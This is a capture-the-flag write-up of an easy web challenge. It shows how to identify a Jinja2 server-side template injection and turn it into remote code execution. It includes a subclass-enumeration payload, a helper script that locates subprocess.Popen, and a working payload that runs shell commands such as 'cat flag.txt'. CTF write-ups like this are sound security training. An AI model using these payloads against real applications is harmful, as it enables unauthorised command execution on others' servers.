Super Secure Technology Infrastructure
Easy
146
9
Description
Super secure technology infrastructure, A fortress built with digital flair, Encrypted and protected, no intrusion allowed, Our data safe from any dare. Poem by ChatGPT
By the challenge title, we can identify that it is a Server Side Template Injection
vulnerability.
First, we will need to identify the templating engine used, and we can refer to this chart below.

After playing with the input, we can identify that it is running Jinja2
. We can also refer the the hacktricks guide to identify the templating engine.
Referring to the Jinja2 SSTI guide, we are able to perform remote code execution and get the flag!
First, we will need to identify the <class 'subprocess.Popen'>
offset. We can find it using the payload below to list all the subclasses
{{''.__class__.__mro__[1].__subclasses__()}}

Very handy script to find the offset
data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
data = data.split(', ')
id = []
for i,d in enumerate(data):
if 'subprocess' in d:
print("Found in index:",i)
id.append(i)
for i in id:
print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")

After finding <class 'subprocess.Popen'>
we can then utilize it to perform RCE.
{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}

References
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
Last updated
Was this helpful?